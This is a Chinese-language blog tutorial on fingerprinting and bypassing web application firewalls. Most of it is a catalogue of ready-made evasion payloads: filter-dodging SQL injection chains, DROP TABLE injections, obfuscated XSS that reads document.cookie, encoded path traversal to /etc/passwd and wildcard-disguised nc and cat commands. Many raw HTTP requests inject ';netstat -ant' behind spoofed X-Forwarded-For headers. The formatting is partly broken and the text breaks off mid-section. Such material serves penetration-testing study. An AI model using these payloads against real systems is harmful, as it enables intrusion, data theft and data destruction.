waf入门到bypass

2023-11-23 22:27:05

介绍

如何识别WAF

在请求中设置自己的cookie，例如：Citrix、Netscaler、Yunsuo WAF、safedog。

在header中关联，例如：Anquanbao WAF、AmazonAWSWAF。

经常更改标头和混乱的字符以使攻击者感到困惑，例如：Netscaler、Big-IP。

在服务器头数据包中暴露自己，例如： Approach、WTS WAF。

一些WAF在响应内容body中公开自身。例如：DotDefender、Armor、Sitelock。

其他WAF会对恶意请求做出不寻常的响应代码答复。例如：WebKnight、360WAF。

有些WAF会返回一堆垃圾数据。例如：百度云加速乐。

检测技术:

从浏览器发出普通的GET请求，拦截并记录响应头（特别是cookie）。
从命令行（例如curl）发出请求，并测试响应内容和标头（不包括user-agent）。
向随机开放的端口发出GET请求，并抓住可能暴露WAF身份的标语。
如果某处有登录页面，表单页面等.请尝试一些常见的（易于检测的）有效负载，例如 " or 1=1 -- -
将../../../etc/passwd附加到URL末尾的随机参数
在url的末尾添加一些吸引人的关键字，如'or sleep（5）‘
使用过时的协议（如http/0.9）发出get请求（http/0.9不支持post类型查询）。
很多时候，waf根据不同的交互类型改变服务器头。
删除操作技术-发送一个原始的fin/rst包到服务器并识别响应。
侧通道攻击-检查请求和响应内容的计时行为。

主流WAF指纹识别:

识别工具

wafw00f https://github.com/enablesecurity/wafw00f 28

identywaf https://github.com/stamparm/identywaf 7

WAF绕过技巧

Fuzzing绕过

测试受阻

在对waf测试过程中，下面这段请求被WAF拦截

GET /get/index.jsp?id=payload HTTP/1.1 Host: 192.168.1.101 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1

选择Fuzzing字典

https://github.com/danielmiessler/SecLists/tree/master/Fuzzing 16

https://github.com/fuzzdb-project/fuzzdb/tree/master/attack 6

https://github.com/foospidy/payloads 7

脚本编写

def fuzzing(payload): payloads = [] special_chars = ['\r', '\n', '\t', '_', '~', '&', '-', '=', '/', '*','^', '$', ',', '.', '/', '<', '>', '|', '/**/', '--','\r\n', '||'] #special_chars 字典在步骤2中选择合适的 for char in special_chars: for k in range(len(payload)): try: temp_payload = payload[:k] + char + payload[k:] payloads.append(temp_payload) except Exception as e: print(e) return payloads

SQL注入

过滤关键词:and, or, union
可能正则: preg_match('/(and|or|union)/i', $id)

- Blocked: union select user, password from users - Bypass: 1 || (select user from users where user_id = 1) = 'admin'

过滤关键词: and, or, union, where

- Blocked: 1 || (select user from users where user_id = 1) = 'admin' - Bypass: 1 || (select user from users limit 1) = 'admin'

过滤关键词: and, or, union, where , limit

- Blocked: 1 || (select user from users limit 1) = 'admin' - Bypass: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

过滤关键词: and, or, union, where ,limit , group by, select

- Blocked: 1 || (select user from users group by user_id having user_id = 1) = 'admin' - Bypass: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1

过滤关键词: and, or, union, where ,limit , group by , select

- Blocked: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1 - Bypass: 1 || 1 = 1 into outfile 'result.txt' - Bypass: 1 || substr(user,1,1) = 'a'

过滤关键词: and, or, union, where ,limit , group by , select , '

- Blocked: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1 - Bypass: 1 || user_id is not null - Bypass: 1 || substr(user,1,1) = 0x61 - Bypass: 1 || substr(user,1,1) = unhex(61)

过滤关键词: and, or, union, where ,limit , group by , select,',hex

- Blocked: 1 || substr(user,1,1) = unhex(61) - Bypass: 1 || substr(user,1,1) = lower(conv(11,10,36))

过滤关键词: and, or, union, where ,limit , group by , select,',hex , substr

- Blocked: 1 || substr(user,1,1) = lower(conv(11,10,36)) - Bypass: 1 || lpad(user,7,1)

过滤关键词: and, or, union, where ,limit , group by , select,',hex , substr ,white space

- Blocked: 1 || lpad(user,7,1) - Bypass: 1%0b||%0blpad(user,7,1)

技巧三：混淆

大小写切换

一些开发不完善的WAF会选择性过滤特定案例的WAF。.

我们可以结合使用大小写字符来开发有效的有效载荷.

Standard: Bypassed: Standard: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME' Bypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'

url编码

使用％编码/ URL编码对普通有效载荷进行编码。

在线工具

Burp包含一个内置编码器/解码器

Blocked:

 
 
Unicode规范化 
unicode编码编码的ASCII字符为绕过提供了很大的Bapass 
您可以对整个/部分有效载荷进行编码以获得结果 
Standard:  Obfuscated:  Blocked: /?redir=http://google.com Bypassed: /?redir=http://google。com (Unicode替代) Blocked: x Bypassed: ＜marquee loop＝1 onfinish＝alert︵1)>x (Unicode替代) Standard: ../../etc/passwd Obfuscated: %C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd  
 
HTML Representation 
通常，网络应用会将特殊字符编码为HTML编码，并相应地进行渲染. 
Standard: "> Encoded: "><img src=x onerror=confirm()> (一般形式) Encoded: "><img src=x onerror=confirm()> (html编码)  
 
混合编码 
有时，WAF规则通常倾向于滤除特定类型的编码. 
混合编码有效载荷可以绕过这种类型的过滤器. 
制表符和换行符进一步增加了混淆. 
Obfuscated: 
XSS  
 
使用注释 
注释混淆标准有效载荷向量. 
不同的有效载荷具有不同的混淆方式. 
Blocked:  Bypassed:  Blocked: /?id=1+union+select+1,2,3-- Bypassed: /?id=1+un/**/ion+sel/**/ect+1,2,3--  
 
双重编码 
通常，WAF过滤器倾向于对字符进行编码以防止攻击. 
但是，开发不完善的过滤器（没有递归过滤器）可以使用双重编码来绕过. 
Standard: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\ Obfuscated: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\ Standard:  Obfuscated: %253Cscript%253Ealert()%253C%252Fscript%253E  
 
通配混淆 
各种命令行实用程序都使用通配符模式来处理多个文件. 
我们可以调整它们以执行系统命令. 
特定于linux系统上的远程执行代码漏洞. 
Standard: /bin/cat /etc/passwd Obfuscated: /???/??t /???/??ss?? Used chars: / ? t s Standard: /bin/nc 127.0.0.1 1337 Obfuscated: /???/n? 2130706433 1337 Used chars: / ? n [0-9]  
 
动态有效载荷生成 
不同的编程语言具有不同的连接语法和模式. 
这使我们能够有效地生成可以绕过许多过滤器和规则的有效载荷. 
Standard:  Obfuscated:  Standard: /bin/cat /etc/passwd Obfuscated: /bi'n'''/c''at' /e'tc'/pa''ss'wd Standard:  Obfuscated: <iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';> </code></p> 
<p>根据这个思路，我们可以继续向其延申</p> 
<p><code><svg/onload=self[`al`+`ert`]`1`> <svg/onload=window[`al`+`ert`]`1`> <svg/onload=parent[`al`+`ert`]`1`> <svg/onload=self[`al`+`ert`]`1`> <svg/onload=top[`al`+`ert`]`1`> <svg/onload=frames[`al`+`ert`]`1`> <svg/onload=self.frames[`al`+`ert`]`1`> <svg/onload=self.top[`al`+`ert`]`1`> <svg/onload=self.self[`al`+`ert`]`1`> <svg/onload=self.parent[`al`+`ert`]`1`> <svg/onload=self.window[`al`+`ert`]`1`> <svg/onload=top[`al`+`ert`](`docu`+`ment.cookie`)> <svg/onload=self[`aler`+`t`]`1`> <svg/onload=self[`al`+`ert`]`1`> <svg/onload=self[`al`%2b`ert`]`1`> </code></p> 
<p></p> 
<p><strong>垃圾字符</strong></p> 
<p>正常的有效载荷很容易被过滤掉.</p> 
<p>添加一些垃圾字符有助于避免检测（仅限特定情况）.</p> 
<p>它们通常有助于混淆基于正则表达式的防火墙.</p> 
<p><code>Standard: <script>alert()</script> Obfuscated: <script>+-+-1-+-+alert(1)</script> Standard: <BODY onload=alert()> Obfuscated: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^=alert()>` </code></p> 
<p><code>Standard: <a href=javascript;alert()>ClickMe Bypassed: <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe </code></p> 
<p></p> 
<p><strong>换行符</strong></p> 
<p>许多具有基于正则表达式的WAF可以有效地阻止许多尝试.</p> 
<p>换行符（CR / LF）可以破坏防火墙的正则表达式并绕过某些东西.</p> 
<p><code>Standard: <iframe src=javascript:confirm(0)"> Obfuscated: <iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(0)"> </code></p> 
<p></p> 
<p><strong>未初始化的变量</strong></p> 
<p>初始化的bash变量可以规避基于正则表达式的错误过滤器和模式匹配.</p> 
<p>它们的值等于null /它们的作用类似于空字符串.</p> 
<p>bash和perl都允许这种解释.</p> 
<p>变量名称可以具有任意数量的随机字符。我在这里将它们表示为$ aaaaaa，$ bbbbbb等。您可以将它们替换为任意数量的随机字符，例如$ ushdjah等 .</p> 
<p><code>- Level 1 混淆: Normal Standard: /bin/cat /etc/passwd Obfuscated: /bin/cat$u /etc/passwd$u - Level 2 混淆: Postion Based Standard: /bin/cat /etc/passwd Obfuscated: $u**/bin**$u**/cat**$u $u**/etc**$u**/passwd**$u - Level 3 混淆: Random characters Standard: /bin/cat /etc/passwd Obfuscated: $aaaaaa**/bin**$bbbbbb**/cat**$ccccccc $dddddd**/etc**$eeeeeee**/passwd**$fffffff </code></p> 
<p>精心制作的payload:</p> 
<p><code>$sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf </code></p> 
<p></p> 
<p><strong>制表符和换行符</strong></p> 
<p>选项卡通常有助于规避防火墙，尤其是基于正则表达式的防火墙.</p> 
<p>当正则表达式需要空格而不是制表符时，制表符可以帮助打破防火墙正则表达式.</p> 
<p><code>Standard: <IMG SRC="javascript:alert();"> Bypassed: <IMG SRC=" javascript:alert();"> Variant: <IMG SRC=" jav ascri pt:alert ();"> Standard: http://test.com/test?id=1 union select 1,2,3 Standard: http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3 Standard: <iframe src=javascript:alert(1)> Obfuscated:  
 
令牌破坏者 
对令牌生成器的攻击试图打破在令牌破坏者的帮助下将请求拆分为令牌的逻辑. 
令牌破译器是允许影响字符串元素和某个令牌之间的对应关系的符号，从而绕过通过签名进行搜索. 
但是，在使用令牌断开器时，请求必须仍然有效. 
- Case: Unknown Token for the Tokenizer - Payload: ?id=‘-sqlite_version() UNION SELECT password FROM users -- - Case: Unknown Context for the Parser (Notice the uncontexted bracket) - Payload 1: ?id=123);DROP TABLE users -- - Payload 2: ?id=1337) INTO OUTFILE ‘xxx’ --  
 
burpsuit插件 
 https://github.com/codewatchorg/bypasswaf 11 
 
X-Originating-IP 
 用户可以修改在每个请求中发送的X-Originating-IP，X-Forwarded-For，X-Remote-IP，X-Remote-Addr头。 这可能是顶部绕过技术的工具。 将WAF配置为信任自己（127.0.0.1）或上游代理设备是常见的，这是此绕过目标。 
 
原始请求 插件改变后
X-Originating-IP：原始IP X-Originating-IP：127.0.0.1
X-Forwarded-For：原始IP X-Forwarded-For：127.0.0.1
X-Remote-IP：原始IP X-Remote-IP：127.0.0.1
X-Remote-Addr：原始IP X-Remote-Addr：127.0.0.1 
案例X-Originating-IP > 127.0.0.1： 
GET /get/?id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 X-Originating-IP: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Client-IP: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close X-Forwarded-For:127.0.0.2 Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1  
Content-type 
 “Content-Type”头部在每个请求中可以保持不变，从所有请求中删除，或者修改为每个请求的许多其他选项之一。 一些WAF将仅仅基于已知内容类型来解码/评估请求，这个特征针对该弱点。 
 
原始请求 结果
Content-Type：原始 Content-Type：原始
Content-Type：原始 删除Content-Type
Content-Type：原始 Content-Type: invalid
Content-Type：原始 Content-Type: example
Content-Type：原始 Content-Type: multipart/
Content-Type：原始 Content-Type: multipart/digest
Content-Type：原始 Content-Type: multipart/digest; boundary=0000
Content-Type：原始 Content-Type: multipart/; boundary=0000 
案例： 
POST /post_key/main.jsp HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Typeapplication/x-www-form-urlencoded Referer: http://10.100.12.249:8080/post_key/ Content-Length: 30 Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 Content-Type: multipart/; boundary=0000 name=%3Bnetstat+-ant+&pass=1  
Host 
 也可以修改“主机”标题。 配置不当的WAF可能配置为仅根据此标头中找到的主机的正确FQDN来评估请求，这是此绕过目标。 
 
案例： 
POST /post_key/main.jsp HTTP/1.1 Host: 改变这里 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Typeapplication/x-www-form-urlencoded Referer: http://10.100.12.249:8080/post_key/ Content-Length: 30 Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 Content-Type: multipart/; boundary=0000 name=%3Bnetstat+-ant+&pass=1  
Pathinfo 
 路径注入功能可以不修改请求，注入随机路径信息（/path/to/example.php/randomvalue?restofquery），或注入随机路径参数（/path/to/example.php;randomparam=randomvalue？ resetofquery）。 这可以用于绕过依赖于路径信息的编写不良的规则。 
 
 原始请求
 GET /get/?id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 
 Pathinfoinjection
 GET /get//fhwa84a04vq8a0jnefo?id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 
 PathParametwesinjection
 GET /get/;mhz=cpv?id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1  
#### PathObfuscation > 路径混淆功能将路径中的最后一个正斜杠修改为随机值，或者默认情况下不做任何操作。 最后一个斜杠可以修改为许多值中的一个，在许多情况下导致仍然有效的请求，但是可以绕过依赖于路径信息的写得不好的WAF规则。 - 原始请求 ```http GET /get/?id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1  
 PathObfuscation_//
 GET /get///?id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 
 PathObfuscation_/./
 GET /get/././?id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 
 PathObfuscation_/random/./
 GET /get/co7t/../co7t/../?id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 
 PathObfuscation_\
 GET \get\?id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 
 PathObfuscation_/.//
 GET /get/.//.//?id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 
 PathObfuscation_/./\
 GET /get/././\\?id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 
 PathObfuscation_/.\
 GET /get/.\.\?id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 
 ParamObfuscation
 
 原始请求
 GET /get/?id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 
 ParamObfuscation_+
 GET /get/?+id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 
 ParamObfuscation_%
 GET /get/?%id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 
 ParamObfuscation_%20
 GET /get/?%20id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 
 ParamObfuscation_%00
 GET /get/?%00id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1  
HPP 
 对已有参数进行赋值，参数污染 
 
 原始攻击
 GET /get/?id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 
 HPP.First_test(赋值test)
 GET /get/?id=;netstat%20-ant&id=test&id=test&id=test HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 
 HPP.Last_test
 GET /get/?id=test&id=test&id=test&id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1  
SpaceEncoding 
 对空格进行编码 
 
原始攻击 
GET /get/?id=;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1  
 URL编码
 
 %u编码
 GET /get/?id=;netstat%u0000-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 Content-Length: 6 
 Double URL
 GET /get/?id=;netstat%2500-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 Content-Length: 6 
 Double Double
 GET /get/?id=;netstat%25%30%30-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 Content-Length: 6 
 HEX
 GET /get/?id=;netstatx00-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 Content-Length: 6  
绕过实战 
字符编码绕过WAF 
在进行测试时候发现下面这段请求被拦截,很明显带有注入特征 
POST /sample.aspx?input0=something HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Length: 41 input1='union all select * from users--  
我们使用下面的编码技术进行编码绕过 
